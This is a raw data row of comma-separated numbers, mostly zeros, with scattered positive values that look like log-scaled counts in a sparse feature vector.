5.075173815233827, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 3.784189633918261, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 10.847027830639663, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 7.471502607305073, 0.0, 0.0, 1.3862943611198906, 0.0, 3.4339872044851467, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 4.795790545596741, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 3.0841946160253877, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.550898738446989, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 5.278114659230517, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0, 1.9459101490553132, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.605170185988092, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.1972245773362196, 0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 3.295836866004329, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 3.58351893845611, 0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 5.723585101952381, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 